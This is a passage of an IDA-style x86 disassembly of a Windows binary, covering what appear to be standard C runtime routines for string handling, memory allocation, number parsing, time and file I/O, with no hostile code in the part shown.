lea edi, [ecx-3]
jmp short loc_417A71
; ---------------------------------------------------------------------------
loc_417A6E: ; CODE XREF: sub_417A10+39�j
lea edi, [ecx-4]
loc_417A71: ; CODE XREF: sub_417A00+5�j
; sub_417A10+52�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_417A96
loc_417A7D: ; CODE XREF: sub_417A10+7D�j
mov dl, [ecx]
inc ecx
test dl, dl
jz short loc_417AE8
mov [edi], dl
inc edi
test ecx, 3
jnz short loc_417A7D
jmp short loc_417A96
; ---------------------------------------------------------------------------
loc_417A91: ; CODE XREF: sub_417A10+9E�j
; sub_417A10+B8�j
mov [edi], edx
add edi, 4
loc_417A96: ; CODE XREF: sub_417A10+6B�j
; sub_417A10+7F�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_417A91
test dl, dl
jz short loc_417AE8
test dh, dh
jz short loc_417ADF
test edx, 0FF0000h
jz short loc_417AD2
test edx, 0FF000000h
jz short loc_417ACA
jmp short loc_417A91
; ---------------------------------------------------------------------------
loc_417ACA: ; CODE XREF: sub_417A10+B6�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_417AD2: ; CODE XREF: sub_417A10+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_417ADF: ; CODE XREF: sub_417A10+A6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_417AE8: ; CODE XREF: sub_417A10+72�j
; sub_417A10+A2�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_417A10 endp
; =============== S U B R O U T I N E =======================================
sub_417AF0 proc near ; CODE XREF: sub_402368+93�p
; sub_402368+A1�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_417B10
loc_417AFC: ; CODE XREF: sub_417AF0+19�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_417B43
test ecx, 3
jnz short loc_417AFC
add eax, 0
loc_417B10: ; CODE XREF: sub_417AF0+A�j
; sub_417AF0+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_417B10
mov eax, [ecx-4]
test al, al
jz short loc_417B61
test ah, ah
jz short loc_417B57
test eax, 0FF0000h
jz short loc_417B4D
test eax, 0FF000000h
jz short loc_417B43
jmp short loc_417B10
; ---------------------------------------------------------------------------
loc_417B43: ; CODE XREF: sub_417AF0+11�j
; sub_417AF0+4F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_417B4D: ; CODE XREF: sub_417AF0+48�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_417B57: ; CODE XREF: sub_417AF0+41�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_417B61: ; CODE XREF: sub_417AF0+3D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_417AF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417B70 proc near ; CODE XREF: sub_402822+8�p
; sub_402E92+8�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_417B90
loc_417B7C: ; CODE XREF: sub_417B70+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_417B7C
loc_417B90: ; CODE XREF: sub_417B70+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_417B70 endp
; =============== S U B R O U T I N E =======================================
sub_417B9F proc near ; CODE XREF: sub_403A47+7A�p
; sub_403A47+8A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov ecx, eax
cmp word ptr [eax], 0
jz short loc_417BB3
loc_417BAB: ; CODE XREF: sub_417B9F+12�j
inc ecx
inc ecx
cmp word ptr [ecx], 0
jnz short loc_417BAB
loc_417BB3: ; CODE XREF: sub_417B9F+A�j
mov edx, [esp+arg_4]
push esi
loc_417BB8: ; CODE XREF: sub_417B9F+26�j
mov si, [edx]
mov [ecx], si
inc ecx
inc ecx
inc edx
inc edx
test si, si
jnz short loc_417BB8
pop esi
retn
sub_417B9F endp
; =============== S U B R O U T I N E =======================================
sub_417BC9 proc near ; CODE XREF: sub_404D78+35B�p
; sub_404D78+3D7�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
push esi
mov dx, [ecx]
lea esi, [eax+2]
mov [eax], dx
loc_417BDB: ; CODE XREF: sub_417BC9+21�j
inc ecx
inc ecx
test dx, dx
jz short loc_417BEC
mov dx, [ecx]
mov [esi], dx
inc esi
inc esi
jmp short loc_417BDB
; ---------------------------------------------------------------------------
loc_417BEC: ; CODE XREF: sub_417BC9+17�j
pop esi
retn
sub_417BC9 endp
; =============== S U B R O U T I N E =======================================
sub_417BEE proc near ; CODE XREF: sub_403BE2+220�p
; sub_403E35+C1�p ...
arg_0 = dword ptr 4
push dword_5158DC
push [esp+4+arg_0]
call sub_417C00
pop ecx
pop ecx
retn
sub_417BEE endp
; =============== S U B R O U T I N E =======================================
sub_417C00 proc near ; CODE XREF: sub_417BEE+A�p
; sub_418F5C+6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_417C29
loc_417C07: ; CODE XREF: sub_417C00+27�j
push [esp+arg_0]
call sub_417C2C
test eax, eax
pop ecx
jnz short locret_417C2B
cmp [esp+arg_4], eax
jz short locret_417C2B
push [esp+arg_0]
call sub_419BC2
test eax, eax
pop ecx
jnz short loc_417C07
loc_417C29: ; CODE XREF: sub_417C00+5�j
xor eax, eax
locret_417C2B: ; CODE XREF: sub_417C00+13�j
; sub_417C00+19�j
retn
sub_417C00 endp
; =============== S U B R O U T I N E =======================================
sub_417C2C proc near ; CODE XREF: sub_417C00+B�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
cmp esi, dword_43B7BC
ja short loc_417C44
push esi
call sub_419FAD
test eax, eax
pop ecx
jnz short loc_417C60
loc_417C44: ; CODE XREF: sub_417C2C+B�j
test esi, esi
jnz short loc_417C4B
push 1
pop esi
loc_417C4B: ; CODE XREF: sub_417C2C+1A�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push 0
push dword_516EC0
nop
call near ptr 7C9105D4h
loc_417C60: ; CODE XREF: sub_417C2C+16�j
pop esi
retn
sub_417C2C endp
; =============== S U B R O U T I N E =======================================
sub_417C62 proc near ; CODE XREF: sub_403E35+10E�p
; sub_403E35+116�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_417C8F
push esi
call sub_419C57
pop ecx
test eax, eax
push esi
jz short loc_417C81
push eax
call sub_419C82
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_417C81: ; CODE XREF: sub_417C62+13�j
push 0
push dword_516EC0
nop
call near ptr 7C91043Dh
loc_417C8F: ; CODE XREF: sub_417C62+7�j
pop esi
retn
sub_417C62 endp
; =============== S U B R O U T I N E =======================================
sub_417C91 proc near ; CODE XREF: sub_404D78+2B9�p
; sub_404D78+2DE�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
cmp word ptr [ecx], 0
lea eax, [ecx+2]
jz short loc_417CA8
loc_417C9E: ; CODE XREF: sub_417C91+15�j
mov dx, [eax]
inc eax
inc eax
test dx, dx
jnz short loc_417C9E
loc_417CA8: ; CODE XREF: sub_417C91+B�j
sub eax, ecx
sar eax, 1
dec eax
retn
sub_417C91 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417CAE proc near ; CODE XREF: sub_404D78+17C�p
; sub_40EB6D+19�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_0]
push ebx
push esi
xor esi, esi
xor eax, eax
cmp edx, esi
push edi
jz loc_417D7B
mov edi, [ebp+arg_8]
cmp edi, esi
jz loc_417DA8
cmp dword_5158EC, esi
jnz short loc_417CFF
cmp edi, esi
jbe loc_417DA8
loc_417CDE: ; CODE XREF: sub_417CAE+4A�j
mov ecx, [ebp+arg_4]
add ecx, eax
movzx si, byte ptr [ecx]
mov [edx], si
cmp byte ptr [ecx], 0
jz loc_417DA8
inc eax
inc edx
inc edx
cmp eax, edi
jb short loc_417CDE
jmp loc_417DA8
; ---------------------------------------------------------------------------
loc_417CFF: ; CODE XREF: sub_417CAE+26�j
mov ebx, [ebp+arg_4]
mov esi, dword_421074
push edi
push edx
push 0FFFFFFFFh
push ebx
push 9
push dword_5158FC
call esi ; MultiByteToWideChar
test eax, eax
jnz loc_417DA7
nop
call near ptr 7C910331h
cmp eax, 7Ah
jz short loc_417D39
loc_417D2A: ; CODE XREF: sub_417CAE+CB�j
; sub_417CAE+F7�j
mov dword_515884, 2Ah
or eax, 0FFFFFFFFh
jmp short loc_417DA8
; ---------------------------------------------------------------------------
loc_417D39: ; CODE XREF: sub_417CAE+7A�j
lea ecx, [edi-1]
mov eax, ebx
mov [ebp+arg_4], ecx
loc_417D41: ; CODE XREF: sub_417CAE+B3�j
mov cl, [eax]
test cl, cl
jz short loc_417D63
mov edx, off_43B5A0
movzx ecx, cl
test byte ptr [edx+ecx*2+1], 80h
jz short loc_417D58
inc eax
loc_417D58: ; CODE XREF: sub_417CAE+A7�j
mov ecx, [ebp+arg_4]
inc eax
dec [ebp+arg_4]
test ecx, ecx
jnz short loc_417D41
loc_417D63: ; CODE XREF: sub_417CAE+97�j
push edi
sub eax, ebx
push [ebp+arg_0]
push eax
push ebx
push 1
push dword_5158FC
call esi ; MultiByteToWideChar
test eax, eax
jnz short loc_417DA8
jmp short loc_417D2A
; ---------------------------------------------------------------------------
loc_417D7B: ; CODE XREF: sub_417CAE+F�j
cmp dword_5158EC, esi
jnz short loc_417D8E
push [ebp+arg_4]
call sub_417AF0
pop ecx
jmp short loc_417DA8
; ---------------------------------------------------------------------------
loc_417D8E: ; CODE XREF: sub_417CAE+D3�j
push esi
push esi
push 0FFFFFFFFh
push [ebp+arg_4]
push 9
push dword_5158FC
nop
call near ptr 7C809BF8h
cmp eax, esi
jz short loc_417D2A
loc_417DA7: ; CODE XREF: sub_417CAE+6B�j
dec eax
loc_417DA8: ; CODE XREF: sub_417CAE+1A�j
; sub_417CAE+2A�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
sub_417CAE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417DAD proc near ; CODE XREF: sub_417FB5+E�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
and [ebp+var_8], 0
push esi
push edi
mov edi, [ebp+arg_0]
mov bl, [edi]
lea esi, [edi+1]
mov [ebp+var_4], esi
loc_417DC5: ; CODE XREF: sub_417DAD+46�j
cmp dword_43B7AC, 1
jle short loc_417DDD
movzx eax, bl
push 8
push eax
call sub_419B4D
pop ecx
pop ecx
jmp short loc_417DEC
; ---------------------------------------------------------------------------
loc_417DDD: ; CODE XREF: sub_417DAD+1F�j
mov ecx, off_43B5A0
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 8
loc_417DEC: ; CODE XREF: sub_417DAD+2E�j
test eax, eax
jz short loc_417DF5
mov bl, [esi]
inc esi
jmp short loc_417DC5
; ---------------------------------------------------------------------------
loc_417DF5: ; CODE XREF: sub_417DAD+41�j
cmp bl, 2Dh
mov [ebp+var_4], esi
jnz short loc_417E03
or [ebp+arg_C], 2
jmp short loc_417E08
; ---------------------------------------------------------------------------
loc_417E03: ; CODE XREF: sub_417DAD+4E�j
cmp bl, 2Bh
jnz short loc_417E0E
loc_417E08: ; CODE XREF: sub_417DAD+54�j
mov bl, [esi]
inc esi
mov [ebp+var_4], esi
loc_417E0E: ; CODE XREF: sub_417DAD+59�j
mov eax, [ebp+arg_8]
test eax, eax
jl loc_417FA5
cmp eax, 1
jz loc_417FA5
cmp eax, 24h
jg loc_417FA5
push 10h
test eax, eax
pop ecx
jnz short loc_417E56
cmp bl, 30h
jz short loc_417E40
mov [ebp+arg_8], 0Ah
jmp short loc_417E72
; ---------------------------------------------------------------------------
loc_417E40: ; CODE XREF: sub_417DAD+88�j
mov al, [esi]
cmp al, 78h
jz short loc_417E53
cmp al, 58h
jz short loc_417E53
mov [ebp+arg_8], 8
jmp short loc_417E72
; ---------------------------------------------------------------------------
loc_417E53: ; CODE XREF: sub_417DAD+97�j
; sub_417DAD+9B�j
mov [ebp+arg_8], ecx
loc_417E56: ; CODE XREF: sub_417DAD+83�j
cmp [ebp+arg_8], ecx
jnz short loc_417E72
cmp bl, 30h
jnz short loc_417E72
mov al, [esi]
cmp al, 78h
jz short loc_417E6A
cmp al, 58h
jnz short loc_417E72
loc_417E6A: ; CODE XREF: sub_417DAD+B7�j
mov bl, [esi+1]
inc esi
inc esi
mov [ebp+var_4], esi
loc_417E72: ; CODE XREF: sub_417DAD+91�j
; sub_417DAD+A4�j ...
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
mov edi, 103h
mov [ebp+var_C], eax
loc_417E82: ; CODE XREF: sub_417DAD+16C�j
cmp dword_43B7AC, 1
movzx esi, bl
jle short loc_417E9A
push 4
push esi
call sub_419B4D
pop ecx
pop ecx
jmp short loc_417EA5
; ---------------------------------------------------------------------------
loc_417E9A: ; CODE XREF: sub_417DAD+DF�j
mov eax, off_43B5A0
mov al, [eax+esi*2]
and eax, 4
loc_417EA5: ; CODE XREF: sub_417DAD+EB�j
test eax, eax
jz short loc_417EB1
movsx ecx, bl
sub ecx, 30h
jmp short loc_417EE3
; ---------------------------------------------------------------------------
loc_417EB1: ; CODE XREF: sub_417DAD+FA�j
cmp dword_43B7AC, 1
jle short loc_417EC5
push edi
push esi
call sub_419B4D
pop ecx
pop ecx
jmp short loc_417ED0
; ---------------------------------------------------------------------------
loc_417EC5: ; CODE XREF: sub_417DAD+10B�j
mov eax, off_43B5A0
mov ax, [eax+esi*2]
and eax, edi
loc_417ED0: ; CODE XREF: sub_417DAD+116�j
test eax, eax
jz short loc_417F1E
movsx eax, bl
push eax
call sub_41A758
pop ecx
mov ecx, eax
sub ecx, 37h
loc_417EE3: ; CODE XREF: sub_417DAD+102�j
cmp ecx, [ebp+arg_8]
jnb short loc_417F1E
mov esi, [ebp+var_8]
or [ebp+arg_C], 8
cmp esi, [ebp+var_C]
jb short loc_417F08
jnz short loc_417F02
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
cmp ecx, edx
jbe short loc_417F08
loc_417F02: ; CODE XREF: sub_417DAD+147�j
or [ebp+arg_C], 4
jmp short loc_417F11
; ---------------------------------------------------------------------------
loc_417F08: ; CODE XREF: sub_417DAD+145�j
; sub_417DAD+153�j
imul esi, [ebp+arg_8]
add esi, ecx
mov [ebp+var_8], esi
loc_417F11: ; CODE XREF: sub_417DAD+159�j
mov eax, [ebp+var_4]
inc [ebp+var_4]
mov bl, [eax]
jmp loc_417E82
; ---------------------------------------------------------------------------
loc_417F1E: ; CODE XREF: sub_417DAD+125�j
; sub_417DAD+139�j
mov ecx, [ebp+arg_C]
dec [ebp+var_4]
mov edx, [ebp+arg_4]
test cl, 8
jnz short loc_417F3C
test edx, edx
jz short loc_417F36
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_417F36: ; CODE XREF: sub_417DAD+181�j
and [ebp+var_8], 0
jmp short loc_417F89
; ---------------------------------------------------------------------------
loc_417F3C: ; CODE XREF: sub_417DAD+17D�j
test cl, 4
mov eax, 7FFFFFFFh
jnz short loc_417F62
test cl, 1
jnz short loc_417F89
and ecx, 2
jz short loc_417F59
cmp [ebp+var_8], 80000000h
ja short loc_417F62
loc_417F59: ; CODE XREF: sub_417DAD+1A1�j
test ecx, ecx
jnz short loc_417F89
cmp [ebp+var_8], eax
jbe short loc_417F89
loc_417F62: ; CODE XREF: sub_417DAD+197�j
; sub_417DAD+1AA�j
test byte ptr [ebp+arg_C], 1
mov dword_515884, 22h
jz short loc_417F78
or [ebp+var_8], 0FFFFFFFFh
jmp short loc_417F89
; ---------------------------------------------------------------------------
loc_417F78: ; CODE XREF: sub_417DAD+1C3�j
mov ecx, [ebp+arg_C]
and cl, 2
neg cl
sbb ecx, ecx
neg ecx
add ecx, eax
mov [ebp+var_8], ecx
loc_417F89: ; CODE XREF: sub_417DAD+18D�j
; sub_417DAD+19C�j ...
test edx, edx
jz short loc_417F92
mov eax, [ebp+var_4]
mov [edx], eax
loc_417F92: ; CODE XREF: sub_417DAD+1DE�j
test byte ptr [ebp+arg_C], 2
jz short loc_417FA0
mov eax, [ebp+var_8]
neg eax
mov [ebp+var_8], eax
loc_417FA0: ; CODE XREF: sub_417DAD+1E9�j
mov eax, [ebp+var_8]
jmp short loc_417FB0
; ---------------------------------------------------------------------------
loc_417FA5: ; CODE XREF: sub_417DAD+66�j
; sub_417DAD+6F�j ...
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_417FAE
mov [eax], edi
loc_417FAE: ; CODE XREF: sub_417DAD+1FD�j
xor eax, eax
loc_417FB0: ; CODE XREF: sub_417DAD+1F6�j
pop edi
pop esi
pop ebx
leave
retn
sub_417DAD endp
; =============== S U B R O U T I N E =======================================
sub_417FB5 proc near ; CODE XREF: sub_405350+4BD�p
; sub_40F6F1+3897�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 1
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_417DAD
add esp, 10h
retn
sub_417FB5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417FCC proc near ; CODE XREF: sub_405350+266�p
; sub_405350+46A�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
mov [ebp+var_14], 49h
push eax
mov [ebp+var_18], eax
mov [ebp+var_20], eax
call sub_417AF0
mov [ebp+var_1C], eax
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_20]
push [ebp+arg_4]
push eax
call sub_41A824
add esp, 10h
leave
retn
sub_417FCC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418000 proc near ; CODE XREF: sub_405350+4E�p
var_CC = byte ptr -0CCh
var_32 = word ptr -32h
var_24 = dword ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1A = word ptr -1Ah
var_18 = word ptr -18h
var_16 = word ptr -16h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0CCh
lea eax, [ebp+var_10]
push eax
nop
call near ptr 7C80A7D4h
lea eax, [ebp+var_20]
push eax
nop
call near ptr 7C80176Bh
mov ax, [ebp+var_16]
cmp ax, word_515872
jnz short loc_418065
mov ax, [ebp+var_18]
cmp ax, word_515870
jnz short loc_418065
mov ax, [ebp+var_1A]
cmp ax, word_51586E
jnz short loc_418065
mov ax, [ebp+var_1E]
cmp ax, word_51586A
jnz short loc_418065
mov ax, [ebp+var_20]
cmp ax, word_515868
jnz short loc_418065
mov eax, dword_515860
jmp short loc_4180AA
; ---------------------------------------------------------------------------
loc_418065: ; CODE XREF: sub_418000+28�j
; sub_418000+35�j ...
lea eax, [ebp+var_CC]
push eax
nop
call near ptr 7C8350BFh
cmp eax, 0FFFFFFFFh
jz short loc_418092
cmp eax, 2
jnz short loc_41808E
cmp [ebp+var_32], 0
jz short loc_41808E
cmp [ebp+var_24], 0
jz short loc_41808E
push 1
pop eax
jmp short loc_418095
; ---------------------------------------------------------------------------
loc_41808E: ; CODE XREF: sub_418000+7A�j
; sub_418000+81�j ...
xor eax, eax
jmp short loc_418095
; ---------------------------------------------------------------------------
loc_418092: ; CODE XREF: sub_418000+75�j
or eax, 0FFFFFFFFh
loc_418095: ; CODE XREF: sub_418000+8C�j
; sub_418000+90�j
push esi
push edi
lea esi, [ebp+var_20]
mov edi, offset word_515868
movsd
movsd
movsd
movsd
pop edi
mov dword_515860, eax
pop esi
loc_4180AA: ; CODE XREF: sub_418000+63�j
push eax
movzx eax, [ebp+var_4]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_10]
push eax
call sub_41B2D5
mov ecx, [ebp+arg_0]
add esp, 1Ch
test ecx, ecx
jz short locret_4180DA
mov [ecx], eax
locret_4180DA: ; CODE XREF: sub_418000+D6�j
leave
retn
sub_418000 endp
; =============== S U B R O U T I N E =======================================
sub_4180DC proc near ; CODE XREF: sub_4059D0+7C�p
; sub_406B85+4B5�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
or edi, 0FFFFFFFFh
mov eax, [esi+0Ch]
test al, 40h
jz short loc_4180F1
or eax, 0FFFFFFFFh
jmp short loc_41812B
; ---------------------------------------------------------------------------
loc_4180F1: ; CODE XREF: sub_4180DC+E�j
test al, 83h
jz short loc_418129
push esi
call sub_41B4B0
push esi
mov edi, eax
call sub_41B44A
push dword ptr [esi+10h]
call sub_41B397
add esp, 0Ch
test eax, eax
jge short loc_418117
or edi, 0FFFFFFFFh
jmp short loc_418129
; ---------------------------------------------------------------------------
loc_418117: ; CODE XREF: sub_4180DC+34�j
mov eax, [esi+1Ch]
test eax, eax
jz short loc_418129
push eax
call sub_417C62
and dword ptr [esi+1Ch], 0
pop ecx
loc_418129: ; CODE XREF: sub_4180DC+17�j
; sub_4180DC+39�j ...
mov eax, edi
loc_41812B: ; CODE XREF: sub_4180DC+13�j
and dword ptr [esi+0Ch], 0
pop edi
pop esi
retn
sub_4180DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418132 proc near ; CODE XREF: sub_4059D0+4E�p
; sub_406B85+30E�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov ecx, edi
test edi, edi
mov [ebp+var_4], edi
mov [ebp+arg_0], ecx
jnz short loc_418156
xor eax, eax
jmp loc_4181FF
; ---------------------------------------------------------------------------
loc_418156: ; CODE XREF: sub_418132+1B�j
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_418169
mov eax, [esi+18h]
mov [ebp+arg_C], eax
jmp short loc_418175
; ---------------------------------------------------------------------------
loc_418169: ; CODE XREF: sub_418132+2D�j
mov [ebp+arg_C], 1000h
jmp short loc_418175
; ---------------------------------------------------------------------------
loc_418172: ; CODE XREF: sub_418132+C4�j
mov ecx, [ebp+arg_0]
loc_418175: ; CODE XREF: sub_418132+35�j
; sub_418132+3E�j
test word ptr [esi+0Ch], 10Ch
jz short loc_4181A7
mov eax, [esi+4]
test eax, eax
jz short loc_4181A7
cmp ecx, eax
mov edi, ecx
jb short loc_41818C
mov edi, eax
loc_41818C: ; CODE XREF: sub_418132+56�j
push edi
push dword ptr [esi]
push ebx
call sub_417490
sub [ebp+arg_0], edi
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
add ebx, edi
mov edi, [ebp+var_4]
jmp short loc_4181F2
; ---------------------------------------------------------------------------
loc_4181A7: ; CODE XREF: sub_418132+49�j
; sub_418132+50�j
cmp ecx, [ebp+arg_C]
jb short loc_4181DA
cmp [ebp+arg_C], 0
mov eax, ecx
jz short loc_4181BD
xor edx, edx
div [ebp+arg_C]
mov eax, ecx
sub eax, edx
loc_4181BD: ; CODE XREF: sub_418132+80�j
push eax
push ebx
push dword ptr [esi+10h]
call sub_41B65B
add esp, 0Ch
test eax, eax
jz short loc_418204
cmp eax, 0FFFFFFFFh
jz short loc_41820A
sub [ebp+arg_0], eax
add ebx, eax
jmp short loc_4181F2
; ---------------------------------------------------------------------------
loc_4181DA: ; CODE XREF: sub_418132+78�j
push esi
call sub_41B582
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41820E
mov [ebx], al
mov eax, [esi+18h]
inc ebx
dec [ebp+arg_0]
mov [ebp+arg_C], eax
loc_4181F2: ; CODE XREF: sub_418132+73�j
; sub_418132+A6�j
cmp [ebp+arg_0], 0
jnz loc_418172
mov eax, [ebp+arg_8]
loc_4181FF: ; CODE XREF: sub_418132+1F�j
; sub_418132+E6�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_418204: ; CODE XREF: sub_418132+9A�j
or dword ptr [esi+0Ch], 10h
jmp short loc_41820E
; ---------------------------------------------------------------------------
loc_41820A: ; CODE XREF: sub_418132+9F�j
or dword ptr [esi+0Ch], 20h
loc_41820E: ; CODE XREF: sub_418132+B2�j
; sub_418132+D6�j
mov eax, edi
xor edx, edx
sub eax, [ebp+arg_0]
div [ebp+arg_4]
jmp short loc_4181FF
sub_418132 endp
; =============== S U B R O U T I N E =======================================
sub_41821A proc near ; CODE XREF: sub_41823A+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
call sub_41B9C1
test eax, eax
jnz short loc_418224
retn
; ---------------------------------------------------------------------------
loc_418224: ; CODE XREF: sub_41821A+7�j
push eax
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_41B851
add esp, 10h
retn
sub_41821A endp
; =============== S U B R O U T I N E =======================================
sub_41823A proc near ; CODE XREF: sub_4059D0+2A�p
; sub_406B85+134�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 40h
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_41821A
add esp, 0Ch
retn
sub_41823A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41824D proc near ; CODE XREF: sub_405A6A+2B2�p
; sub_406047+101�p ...
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
push 8
xor eax, eax
pop ecx
lea edi, [ebp+var_20]
rep stosd
push 7
pop edi
loc_418266: ; CODE XREF: sub_41824D+32�j
mov dl, [esi]
mov bl, 1
movzx ecx, dl
mov eax, ecx
and ecx, edi
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_20]
or [eax], bl
inc esi
test dl, dl
jnz short loc_418266
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_41828E
mov edx, dword_515878
loc_41828E: ; CODE XREF: sub_41824D+39�j
; sub_41824D+5F�j
mov al, [edx]
push 1
movzx esi, al
mov ecx, esi
pop ebx
and ecx, edi
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test bl, cl
jz short loc_4182AE
test al, al
jz short loc_4182AE
inc edx
jmp short loc_41828E
; ---------------------------------------------------------------------------
loc_4182AE: ; CODE XREF: sub_41824D+58�j
; sub_41824D+5C�j
mov ebx, edx
loc_4182B0: ; CODE XREF: sub_41824D+81�j
mov al, [edx]
test al, al
jz short loc_4182D4
movzx esi, al
mov ecx, esi
push 1
and ecx, edi
pop eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test al, cl
jnz short loc_4182D0
inc edx
jmp short loc_4182B0
; ---------------------------------------------------------------------------
loc_4182D0: ; CODE XREF: sub_41824D+7E�j
and byte ptr [edx], 0
inc edx
loc_4182D4: ; CODE XREF: sub_41824D+67�j
mov eax, ebx
pop edi
sub eax, edx
pop esi
neg eax
sbb eax, eax
mov dword_515878, edx
and eax, ebx
pop ebx
leave
retn
sub_41824D endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4182F0 proc near ; CODE XREF: sub_4062F7+1B4�p
; sub_4071BD+6E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz short loc_418373
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_418314
shr ecx, 2
jnz short loc_418381
jmp short loc_418335
; ---------------------------------------------------------------------------
loc_418314: ; CODE XREF: sub_4182F0+1B�j
; sub_4182F0+37�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
dec ecx
jz short loc_418342
test al, al
jz short loc_41834A
test esi, 3
jnz short loc_418314
mov ebx, ecx
shr ecx, 2
jnz short loc_418381
